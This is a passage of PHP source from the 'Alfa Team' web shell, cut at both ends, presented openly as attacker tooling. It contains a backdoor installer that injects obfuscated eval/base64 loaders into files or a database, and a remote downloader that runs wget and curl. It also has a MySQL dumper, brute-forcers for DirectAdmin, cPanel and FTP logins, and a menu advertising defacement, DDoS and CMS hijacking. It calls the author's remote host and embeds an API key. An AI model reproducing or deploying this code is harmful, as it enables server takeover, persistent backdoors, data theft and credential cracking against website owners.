</tr>
<tr>
<td height=”11″ colspan=”3″><span class=”header_vars”>Open_basedir :</span><b>’.$open_b.’</b> | <span class=”header_vars”>Safe_mode_exec_dir :</span><b>’.$safe_exe.’</b> | <span class=”header_vars”> Safe_mode_include_dir :</span></b>’.$safe_include.’</b></td>
</tr>
<tr>
<td height=”11″><span class=”header_vars”>SoftWare: </span></td>
<td colspan=”2″><b>’.@getenv(‘SERVER_SOFTWARE’).’</b></td>
</tr>’;
if($GLOBALS['sys']==”win”){
echo ‘<tr>
<td height=”12″><span class=”header_vars”>DRIVE:</span></td>
<td colspan=”2″><b>’.$drives.’</b></td>
</tr>’;
}
echo ‘<tr>
<td height=”12″><span class=”header_vars”>PWD:</span></td>
<td colspan=”2″><span id=”header_cwd”>’.$cwd_links.’ </span><a href=”javascript:void(0);” onclick=”g(\’FilesMan\’,\” . $GLOBALS['home_cwd'] . ‘\’,\’\’,\’\’,\’\’)”><span class=”home_shell”>[ Home Shell ]</span> </a><a href=”javascript:void(0);” onclick=”path_history(\’back\’);”><span class=”back_shell”>[ BACK ]</span></a></td>
</tr>
</table>
</div>
<div id=”meunlist”>
<ul>
‘;
$li = array(‘FilesMan’=>’Home’,’proc’=>’Process’,’phpeval’=>’Eval’,’sql’=>’SQL Manager’,’dumper’=>’Mysql Dumper’,’hash’=>’En-Decoder’,’connect’=>’BC’,’ssh2′=>’SSH2′,
‘zoneh’=>’ZONE-H’,’dos’=>’DDOS’,’safe’=>’ByPasser’,’cgishell’=>’Cgi Shell’,’ssiShell’=>’SSI SHELL’,’cpcrack’=>’Hash Tools’,
‘portscanner’=>’Port Scaner’,’basedir’=>’Open BaseDir’,’mail’=>’Fake Mail’,’ziper’=>’Compressor’,’IndexChanger’=>’Index Changer’,’pwchanger’=>’Add New Admin’,’ShellInjectors’=>’Shell Injectors’,
‘php2xml’=>’PHP2XML’,’cloudflare’=>’CloudFlare’,’Whmcs’=>’Whmcs DeCoder’,’symlink’=>’Symlink’,’MassDefacer’=>’Mass Defacer’,’Crackers’=>’BruteForcer’,’searcher’=>’Searcher’,
‘cmshijacker’=>’CMS Hijacker’,’remotedl’=>’Remote Upload’,’inbackdoor’=>’Install BackDoor’,’whois’=>’Whois’,’settings’=>’Alfa Settings’,’plus’=>’<span class=”alfa_plus”>Alfa +</font>’,’selfrm’=>’Remove Shell’
);
foreach($li as $key=>$value){
echo(‘<li><a href=”javascript:void(0);” class=”menu_options” onclick=”g(\”.$key.’\’,null,\’\’,\’\’,\’\’);”>’.$value.’</a></li>’.”\n”);
}
if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
echo ‘<li><a href=”javascript:void(0);” onclick=”g(\’logout\’,null,\’\’,\’\’,\’\’);setTimeout(function(){location.reload();},2000);”><font color=”red”>LogOut</font></a></li></ul></div>’;
else
echo ‘</ul></div>’;}else{
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set(‘error_log’,NULL);
@ini_set(‘log_errors’,0);
@ini_set(‘max_execution_time’,0);
@ini_set(‘magic_quotes_runtime’, 0);
@set_time_limit(0);
}}
function alfalogout(){
unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
echo(“<center><font color=’red’>Logout…</font></center>”);
}
function showAnimation($name){
return ‘-webkit-animation: ‘.$name.’ 800ms ease-in-out forwards;-moz-animation: ‘.$name.’ 800ms ease-in-out forwards;-ms-animation: ‘.$name.’ 800ms ease-in-out forwards;animation: ‘.$name.’ 800ms ease-in-out forwards;’;
}
function __showicon($r){
$s['btn']=’http://solevisible.com/images/btn.png’;
$s['alfamini']=’http://solevisible.com/images/alfamini.png’;
$s['loader']=’http://solevisible.com/images/loader.png’;
//return ‘data:image/png;base64,’.__get_resource($s[$r]);
return $s[$r];
}
function alfainbackdoor(){
alfahead();
echo ‘<div class=header><center><p><div class=”txtfont_header”>| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick=”g(\’inbackdoor\’,null,\’file\’)”>| In File | </a><a href=javascript:void(0) onclick=”g(\’inbackdoor\’,null,\’db\’)”>| In DataBase | </a></h3></center>’;
$error = ‘<font color=”red”>Error In Inject BackDoor…!<br>File Loader is not Writable Or Not Exists…!</font>’;
$success= ‘<font color=”green”>Success…!’;
$textarea = “<div style=’display:none;’ id=’backdoor_textarea’><div class=’txtfont’>Your Shell:</div><p><textarea name=’shell’ rows=’19′ cols=’103′><?php\n\techo(‘Alfa Team is Here…!’);\n?></textarea></p></div>”;
$select = “<div class=’txtfont’>Use:</div> <select name=’method’ style=’width:155px;’ onChange=’inBackdoor(this);’><option value=’alfa’>Alfa Team Uploader</option><option value=’my’>My Private Shell</option></select>”;
$cwd = ‘Example: /home/alfa/public_html/index.php’;
if($_POST['alfa1']==’file’){
echo(“<center><p><div class=’txtfont_header’>| In File |</div></p><p><form onsubmit=\”g(‘inbackdoor’,null,’file’,this.method.value,this.file.value,this.shell.value,this.key.value);return false;\”>{$select} <div class=’txtfont’>Backdoor Loader:</div> <input type=’text’ name=’file’ size=’50′ placeholder=’{$cwd}’> <div class=’txtfont’>Key: </div> <input type=’text’ name=’key’ size=’10′ value=’alfa’> <input type=’submit’ value=’ ‘>{$textarea}</form></p></center>”);
if($_POST['alfa2']!=”&&$_POST['alfa3']!=”&&$_POST['alfa4']!=”){
$method = $_POST['alfa2'];
$file = $_POST['alfa3'];
$shell = $_POST['alfa4'];
$key = str_replace(array(‘”‘,’\”),”,trim($_POST['alfa5']));
if($key==”)$key=’alfa’;
if($method==’my’){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
$code = ‘<?php if(isset($_GET["alfa"])&&$_GET["alfa"]==”‘.$key.’”){$func=”cr”.”ea”.”te_”.”fun”.”ction”;$x=$func(“\$c”,”e”.”v”.”al”.”(\’?>\’.base”.”64″.”_dec”.”ode(\$c));”);$x(“‘.$shell.’”);exit;}?>’;
if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code.”\n”.@file_get_contents($file));__alert($success.”<br>Run With: “.basename($file).”?alfa=”.$key.’</font>’);}else{__alert($error);}}}
if($_POST['alfa1']==’db’){
echo(“<center><p><div class=’txtfont_header’>| In DataBase |</div></p>”.getConfigHtml(‘all’).”<p><form onsubmit=\”g(‘inbackdoor’,null,’db’,this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\”>”);
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_host : ‘, ‘inputName’ => ‘db_host’, ‘id’ => ‘db_host’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_username : ‘, ‘inputName’ => ‘db_username’, ‘id’ => ‘db_user’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_password : ‘, ‘inputName’ => ‘db_password’, ‘id’ => ‘db_pw’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_name : ‘, ‘inputName’ => ‘db_name’, ‘id’ => ‘db_name’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Backdoor Loader: ‘, ‘inputName’ => ‘file’, ‘inputValue’ => $cwd, ‘inputSize’ => ’50′, ‘placeholder’ => true),
‘td6′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Key: ‘, ‘inputName’ => ‘key’, ‘inputValue’ => ‘alfa’, ‘inputSize’ => ’50′)
);
create_table($table);
echo(“<p>{$select}</p>”);
echo($textarea);
echo(“<p><input type=’submit’ value=’ ‘></p></form></p></center>”);
if($_POST['alfa2']!=”&&$_POST['alfa3']!=”&&$_POST['alfa5']!=”&&$_POST['alfa6']!=”){
$dbhost = $_POST['alfa2'];
$dbuser = $_POST['alfa3'];
$dbpw = $_POST['alfa4'];
$dbname = $_POST['alfa5'];
$file = $_POST['alfa6'];
$method = $_POST['alfa7'];
$shell = $_POST['alfa8'];
$key = str_replace(array(‘”‘,’\”),”,trim($_POST['alfa9']));
if($key==”)$key=’alfa’;
if($method==’my’){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
$code = ‘<?php if(isset($_GET["alfa"])&&$_GET["alfa"]==”‘.$key.’”){$conn=mysqli_connect(“‘.str_replace(‘”‘,’\”‘,$dbhost).’”,”‘.str_replace(‘”‘,’\”‘,$dbuser).’”,”‘.str_replace(‘”‘,’\”‘,$dbpw).’”,”‘.str_replace(‘”‘,’\”‘,$dbname).’”);$q=mysqli_query($conn,”SELECT `code` FROM alfa_bc LIMIT 0,1″);$r=mysqli_fetch_assoc($q);$func=”cr”.”ea”.”te_”.”fun”.”ction”;$x=$func(“\$c”,”e”.”v”.”al”.”(\’?>\’.base”.”64″.”_dec”.”ode(\$c));”);$x($r["code"]);exit;}?>’;
if(@is_file($file)&&@is_writable($file)){
@mysqli_query($conn,’DROP TABLE `alfa_bc`’);
@mysqli_query($conn,’CREATE TABLE `alfa_bc` (code LONGTEXT)’);
@mysqli_query($conn,’INSERT INTO `alfa_bc` VALUES(“‘.$shell.’”)’);
@file_put_contents($file,$code.”\n”.@file_get_contents($file));
__alert($success.”<br>Run With: “.basename($file).”?alfa=”.$key.’</font>’);}else{__alert($error);}}}}
echo(‘</div>’);
alfafooter();
}
function alfawhois(){
echo(“<div class=’header’><center><p><div class=’txtfont_header’>| Whois |</div></p><p><form onsubmit=\”g(‘whois’,null,this.url.value,’>>’);return false;\”><div class=’txtfont’>Url: </div> <input type=’text’ name=’url’ style=’text-align:center;’ size=’50′ placeholder=’google.com’> <input type=’submit’ value=’ ‘></form></p></center>”);
if($_POST['alfa2']==’>>’&&!empty($_POST['alfa1'])){
$site = str_replace(array(‘http://’,’https://’,’www.’,’ftp://’),”,$_POST['alfa1']);
$target = ‘http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=’.$site;
$data = @file_get_contents($target);
if($data==”){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
$target = @json_decode($data,true);
echo __pre();
if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx(“whois “.$site);}}
echo(“</div>”);
}
function alfaremotedl(){
alfahead();
echo(“<div class=’header’><center><p><div class=’txtfont_header’>| Upload From Url |</div></p><p>
<form onsubmit=\”g(‘remotedl’,null,this.d.value,this.p.value,’>>’);return false;\”>
<p><div class=’txtfont’>Url: </div>&nbsp;&nbsp;&nbsp;<input type=’text’ name=’d’ size=’50′></p>
<div class=’txtfont’>Path:</div> <input type=’text’ name=’p’ size=’50′ value=’”.$GLOBALS['cwd'].”‘><p><input type=’submit’ value=’ ‘></p>
</form></p></center>”);
if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']==’>>’){
echo __pre();
$url = $_POST['alfa1'];
$path = $_POST['alfa2'];
echo(‘<center>’);
if(__download($url,$path)){
echo(‘<font color=”green”>Success…!</font>’);
}else{
echo(‘<font color=”red”>Error…!</font>’);
}
echo(‘</center>’);
}
echo(“</div>”);
alfafooter();
}
function __download($url,$path=false){
if(!preg_match(“/[a-z]+:\/\/.+/”,$url)) return false;
$saveas = basename(rawurldecode($url));
if($path){$saveas=$path.$saveas;}
if($content = __read_file($url)){
if(@is_file($saveas))@unlink($saveas);
if(__write_file($saveas, $content)){return true;}}
$buff = alfaEx(“wget “.$url.” -O “.$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx(“curl “.$url.” -o “.$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx(“lwp-download “.$url.” “.$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx(“lynx -source “.$url.” > “.$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx(“GET “.$url.” > “.$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx(“links -source “.$url.” > “.$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx(“fetch -o “.$saveas.” -p “.$url);
if(@is_file($saveas)) return true;
return false;
}
function clean_string($string){
if(function_exists(“iconv”)){
$s = trim($string);
$s = iconv(“UTF-8″, “UTF-8//IGNORE”, $s);
}
return $s;
}
function __read_file($file, $boom = true){
$content = false;
if($fh = @fopen($file, “rb”)){
$content = “”;
while(!feof($fh)){
$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
}
}
if(empty($content)||!$content){
$content = alfaEx(“cat ‘”.addslashes($file).”‘”);
}
return $content;
}
function alfaSettings(){
alfahead();
AlfaNum(6,7,8,9,10);
echo ‘<div class=header><center><p><div class=”txtfont_header”>| Settings |</div></p><h3><a href=javascript:void(0) onclick=”g(\’settings\’,null,null,null,null,null,null,null,null,\’main\’)”>| Generall Setting | </a><a href=javascript:void(0) onclick=”g(\’settings\’,null,null,null,null,null,null,null,null,\’color\’)”>| Change Color | </a></h3></center>’;
if($_POST["alfa8"] == “main”){
echo ‘<p><center><div class=”txtfont_header”>| Settings |</div></p><form onSubmit=”reloadSetting(this);return false;” method=\’post\’>’;
$lg_array = array(’0′=>’No’,’1′=>’Yes’);
$penc_array = array(‘false’=>’No’,’true’=>’Yes’);
$protect_html = “”;
$icon_html = “”;
$postEnc_html = “”;
$login_html = “”;
foreach($lg_array as $key=>$val)$protect_html .= ‘<option value=”‘.$key.’” ‘.($GLOBALS['DB_NAME']['safemode']==’1′?’selected’:”).’>’.$val.’</option>’;
foreach($lg_array as $key=>$val)$icon_html .= ‘<option value=”‘.$key.’” ‘.($GLOBALS['DB_NAME']['show_icons']==’1′?’selected’:”).’>’.$val.’</option>’;
foreach($penc_array as $key=>$val)$postEnc_html .= ‘<option value=”‘.$key.’” ‘.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?”selected”:(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?’selected’:”)).’>’.$val.’</option>’;
$lg_array = array(“gui”=>”GUI”,”500″=>”500 Internal Server Error”,”403″=>”403 Forbidden”,”404″=>”404 NotFound”);
foreach($lg_array as $key=>$val)$login_html .= ‘<option value=”‘.$key.’” ‘.($GLOBALS['DB_NAME']['login_page']==$key?’selected’:”).’>’.$val.’</option>’;
echo ”;
echo ‘<table border=”1″><tbody><tr><td><div class=”tbltxt” style=”color:#FFFFFF”>Protect:</div></td><td><select name=”protect” style=”width:100%;”>’.$protect_html.’</select></td></tr><tr><td><div class=”tbltxt” style=”color:#FFFFFF”>Post Encryption:</div></td><td><select name=”post_encrypt” style=”width:100%;”>’.$postEnc_html.’</select></td></tr><tr><td><div class=”tbltxt” style=”color:#FFFFFF”>Show Icons:</div></td><td><select name=”icon” style=”width:100%;”>’.$icon_html.’</select></td></tr><tr><td><div class=”tbltxt” style=”color:#FFFFFF”>login Page:</div></td><td><select style=”width:100%;” name=”lgpage”>’.$login_html.’</select></td></tr><tr><td><div class=”tbltxt” style=”color:#FFFFFF”>UserName:</div></td><td><input type=”text” style=”width:95%;” name=”username” value=”‘.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).’” placeholder=”solevisible”></td></tr><tr><td><div class=”tbltxt” style=”color:#FFFFFF”>Password:</div></td><td><input type=”text” style=”width:95%;” name=”password” placeholder=”*****”></td></tr></tbody></table><input type=”hidden” name=”e” value=”‘.$GLOBALS['DB_NAME']['safemode'].’”><input type=”hidden” name=”s” value=”‘.$GLOBALS['DB_NAME']['show_icons'].’”><p><input type=”submit” name=”btn” value=” “></p></form></center>’;
if($_POST['alfa5']==’>>’){
echo __pre();
if(!empty($_POST['alfa3'])){
$protect = $_POST['alfa1'];
$lgpage = $_POST['alfa2'];
$username = $_POST['alfa3'];
$password = md5($_POST['alfa4']);
$icon = $_POST['alfa6'];
$post_encrypt = $_POST['alfa7'];
@chdir($GLOBALS['home_cwd']);
$basename = @basename($_SERVER['PHP_SELF']);
$data = @file_get_contents($basename);
$find_user = ‘/\’user\’(.*?),/i’;
$find_pw = ‘/\’pass\’(.*?),/i’;
$find_lg = ‘/\’login_page\’(.*?),/i’;
$find_p = ‘/\’safemode\’(.*?),/i’;
$icons = ‘/\’show_icons\’(.*?),/i’;
$postEnc = ‘/\’post_encryption\’(.*?),/i’;
if(!empty($username)&&preg_match($find_user,$data,$e)){
$new = ‘\’user\’ => \”.$username.’\’,’;
$data = str_replace($e[0],$new,$data);
}
if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
$new = ‘\’pass\’ => \”.$password.’\’,’;
$data = str_replace($e[0],$new,$data);
}
if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
$new = ‘\’login_page\’ => \”.$lgpage.’\’,’;
$data = str_replace($e[0],$new,$data);
}
if(!empty($find_p)&&preg_match($find_p,$data,$e)){
$new = ‘\’safemode\’ => \”.$protect.’\’,’;
$data = str_replace($e[0],$new,$data);
}
if(preg_match($icons,$data,$e)){
$new = ‘\’show_icons\’ => \”.$icon.’\’,’;
$data = str_replace($e[0],$new,$data);
}
if(preg_match($postEnc,$data,$e)){
$new = ‘\’post_encryption\’ => ‘.$post_encrypt.’,’;
$data = str_replace($e[0],$new,$data);
}
if(@file_put_contents($basename,$data)){
echo ‘<b>UserName: </b><font color=”green”><b>’.$username.’</b></font><br /><b>Password: </b><font color=”green”><b>’.$_POST['alfa4'].’</b></font><script>post_encryption_mode = ‘.$post_encrypt.’;</script>’;
}else{
__alert(“<span style=’color:red;’>File has no edit access…!</span>”);
}
}else{
__alert(“<span style=’color:red;’>UserName is Empty !</span>”);
}
}
}elseif($_POST["alfa8"] == “color”){
echo(‘<center><p><div class=”txtfont_header”>| Custom Color |</div></p><form onSubmit=”reloadColors();return false;” method=\’post\’>’);
echo ‘<table border=”1″><tbody>’;
$template = ‘<tr><td style=”text-align:center;”><a href=”http://solevisible.com/customcolors/{help}.png” target=”_blank”><font color=”#00FF00″>Help</font></a></td><td style=”text-align:center;”><div class=”tbltxt”>{index}</div></td><td><div class=”tbltxt” style=”margin-left:5px;”>{target}:</div></td><td><input style=”width:60px;” multi=”{multi}” id=”gui_{target}” onChange=”colorHandler(this);” target=”.{target}” type=”color” value=”{color}”></td><td><input type=”text” style=”text-align:center;” multi=”{multi}” onkeyup=”colorHandlerKey(this);” target=”.{target}” id=”input_{target}” class=”colors_input” placeholder=”#ffffff” value=”{color}”></td></tr>’;
$x = 1;
foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
$multi = “”;
if(is_array($value)){
if(isset($value["multi_selector"])){
$multi = __ZW5jb2Rlcg(json_encode($value));
}
}
$value = alfa_getColor($key);
$help = strtolower(str_replace(array(“:”, “+”), array(“_”, “_plus”), $key));
echo str_replace(array(“{index}”, “{target}”, “{color}”, “{multi}”, “{help}”), array($x++, $key, $value, $multi, $help), $template);
}
echo ‘<tr><td style=”text-align:center;”>-</td><td style=”text-align:center;”><div class=”tbltxt”>*</div></td><td><div style=”margin-left:5px;” class=”tbltxt”>Use Default Color:</div></td><td></td><td><center><input type=”checkbox” id=”use_default_color” value=”1″></center></td></tr>’;

echo ‘</tbody></table><p><input type=”submit” name=”btn” value=” “></p></form><p><button style=”padding:4px;;margin-right:20px;” onclick=”$(\’importFileBtn\’).click();” class=”button”> Import </button> <button style=”padding:4px;margin-left:20px;” onclick=”g(\’settings\’,null,null,null,null,null,null,null,\’export\’,\’color\’)” class=”button”> Export </button></center></p>’;
if($_POST['alfa7']==’export’){
echo __pre();
$colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
$glob_colors = $GLOBALS["__ALFA_COLOR__"];
$array = array();
foreach($glob_colors as $k => $v){
if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
$v = trim($colors[$k]);
}else{
$v = trim(is_array($v)?$v["key_color"]:$v);
}
$array[$k] = $v;
}
$file = “alfa_color_config_”.date(‘Y-m-d-h_i_s’).”.conf”;
$config = json_encode($array, JSON_PRETTY_PRINT);
if(!@file_put_contents($file, $config)){
echo(‘<p><center>Color Config:<br><br><textarea rows=”12″ cols=”70″ type=”text”>’.$config.’</textarea></center></p>’);
}else{
echo(‘<h3><p><center><a class=”actions” href=”javascript:void(0);” onclick=”g(\’FilesTools\’,null,\”.$file.’\’, \’download\’)”><font color=”#0F0″>Download Config</font></a></center></p></h3>’);
}
}
if($_POST['alfa2']==’>>’){
echo __pre();
$colors = json_decode($_POST["alfa1"],true);
$array = “”;
$is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]==”1″?true:false;
$glob_colors = $GLOBALS["__ALFA_COLOR__"];
foreach($glob_colors as $k => $v){
if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
$v = trim($colors[$k]);
}else{
$v = trim(is_array($v)?$v["key_color"]:$v);
}
$array .= ‘”‘.trim($k).’” => “‘.$v.’”,’;
}
@chdir($GLOBALS['home_cwd']);
$basename = @basename($_SERVER['PHP_SELF']);
$data = @file_get_contents($basename);
$color = ‘/\’color\’(.*?)\),/s’;
if(preg_match($color,$data,$e)){
$new = “‘color’ => array(“.$array.”),”;
$data = str_replace($e[0],$new,$data);
if(@file_put_contents($basename, $data)){
echo(“<center><p><h3>[+] Success…</h3></p></center><script>location.reload();</script>”);
}else{
echo(“<center><p><h3>[-] We Not have permission to Edit shell…!</h3></p></center>”);
}
}else{
echo(“<center><p><h3>[-] Error…!</h3></p></center>”);
}
}
}
echo(‘</div>’);
alfafooter();
}
function alfaplus(){
alfahead();
echo ‘<div class=”header”><center><p><div class=”txtfont_header”>| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick=”g(\’plus\’,null,\’news\’);”>| News | </a><a href=javascript:void(0) onclick=”g(\’plus\’,null,\’tools\’)”>| Tools | </a><a href=javascript:void(0) onclick=”g(\’plus\’,null,\’about\’)”>| About Us | </a></h3></center>’;
if($_POST['alfa1']==’news’||$_POST['alfa1']==’tools’){
try{
$s1 = ‘http://solevisible.com/’.($_POST['alfa1']==’news’?’news.php’:’tools.php’);
$msg = “<center><font color=’red’><b><p>Can`t Connect to Remote Server …!<br>Please Try Again Later…!</p></b></font></center>”;
$news = new AlfaCURL();
if($news->Send($s1)){
$xml = $news->Send($s1);
}else{
$xml = false;
}
if($xml){
if(@simplexml_load_string($xml)){
$doc = new DOMDocument;
$doc->loadXML($xml);
$data = $doc->getElementsByTagName(‘data’)->item(0);
$items = $data->getElementsByTagName(‘item’);
foreach($items as $item){
$title = $item->getElementsByTagName(‘title’)->item(0)->nodeValue;
$description = $item->getElementsByTagName(‘description’)->item(0)->nodeValue;
$link = $item->getElementsByTagName(‘link’)->item(0)->nodeValue;
$pubDate = $item->getElementsByTagName(‘pubDate’)->item(0)->nodeValue;
echo(__pre().”<center><a href=’$link’ target=’_blank’>$title</a><br>$description<br><small><font  color=’#FFFFFF’><b>Date: $pubDate</b></font></small></center></pre>”);
}
}else{
echo($msg);
}
}else{
echo($msg);
}
}catch(Exception $e){
echo $e->getMessage();
}}elseif($_POST['alfa1']==’about’){
echo __pre().”<pre><center><img src=’http://solevisible.com/images/farvahar-iran.png’><br>
<b><font size=’+3′ color=’#00A220′>&#9774; ~ PEACE ~ &#9774;</font><br><b>
<font color=’#00A220′>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
<font color=’#00A220′>Contact : solevisible@gmail.com</font><br>
<font color=’#00A220′>Telegram Channel: @solevisible</font><br>
<font color=’#FFFFFF’>Skype : ehsan.invisible</font><br>
<font color=’#FFFFFF’>Skype : sole.sad</font><br>
<font color=’#FF0000′>Persian Gulf For Ever</font><br>
<font color=’#FF0000′>Iranian Hackers :)</font><br>
<font color=’#FF0000′>Our Friends : Mr.PERSIA , R3veC0der</font><br>
</center></pre><iframe src=’tg://resolve?domain=solevisible’ frameborder=’0′ width=’0′ height=’0′></iframe>”;
}
echo(‘</div>’);
alfafooter();
}
function alfaDumper(){
alfahead();
echo(‘<div class=”header”>’);
AlfaNum(8,9,10);
echo “<center><br><div class=’txtfont_header’>| Mysql Database Dumper |</div><br><br>”.getConfigHtml(‘all’).”<form method=’post’ onsubmit=\”g(‘dumper’,null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\”><p>”;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_host : ‘, ‘inputName’ => ‘db_host’, ‘id’ => ‘db_host’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_username : ‘, ‘inputName’ => ‘db_username’, ‘id’ => ‘db_user’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_password : ‘, ‘inputName’ => ‘db_password’, ‘id’ => ‘db_pw’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_name : ‘, ‘inputName’ => ‘db_name’, ‘id’ => ‘db_name’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Dump Path: ‘, ‘inputName’ => ‘dfile’, ‘inputValue’ => htmlspecialchars($GLOBALS['cwd']).’alfa.sql’, ‘inputSize’ => ’50′)
);
create_table($table);
echo “<br><input type=’submit’ value=’ ‘ name=’Submit’></p></form></center>”;
$username = ($_POST['alfa3']);
$password = ($_POST['alfa4']);
$dbname = ($_POST['alfa5']);
$dfile = ($_POST['alfa6']);
$host = ($_POST['alfa7']);
if(!empty($dbname)){
echo __pre();
$msg = “<center>Check this :  <font color=’red’>”.$dfile.”</font></center>”;
if(@mysqli_connect($host,$username,$password,$dbname)){
if(strlen(alfaEx(“mysqldump”))>0){
alfaEx(“mysqldump –single-transaction –host=\”$host\” –user=\”$username\” –password=\”$password\” $dbname > ‘”.addslashes($dfile).”‘”);
echo($msg);
}else{
__alert(“Error…!”);
}
}else{
echo(‘<center>mysqli_connect : Error!</center>’);
}
}
echo(‘</div>’);
alfafooter();
}
function Alfa_DirectAdmin_Cracker($info){
if(!$info['mysql'])
$url = $info['protocol'].$info['target'].’:’.$info['port'].’/CMD_LOGIN’;
else $url = $info['protocol'].$info['target'].’/phpmyadmin’;
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,’Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0′);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERPWD, $info['username'].’:’.$info['password']);
if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo “<font color=’red’>Error: $curl_error</font><br>”;}
elseif(preg_match(‘/CMD_FILE_MANAGER|frameset/i’,$result)){
echo ‘UserName: <font color=”red”>’.$info['username'].’</font> PassWord: <font color=”red”>’.$info['password'].’</font><font color=”green”>  Login Success….</font><br>’;
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_CP_Cracker($info){
$url = $info['protocol'].$info['target'].’:’.$info['port'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,’Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0′);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_HTTPHEADER, array(“Authorization: Basic ” . __ZW5jb2Rlcg($info['username'].”:”.$info['password']) . “\n\r”));
curl_setopt($curl, CURLOPT_URL, $url);
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo “<font color=’red’>Error: $curl_error</font><br>”;}
elseif(preg_match(‘/filemanager/i’,$result)){
echo ‘UserName: <font color=”red”>’.$info['username'].’</font> PassWord: <font color=”red”>’.$info['password'].’</font><font color=”green”>  Login Success….</font><br>’;
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_FTP_Cracker($info){
$url = $info['protocol'].$info['target'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT,’Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0′);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERPWD, “”.$info['username'].”:”.$info['password'].””);
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo “<font color=’red’>Error: $curl_error</font><br>”;}
elseif(preg_match(‘/(\d+):(\d+)/i’,$result)){
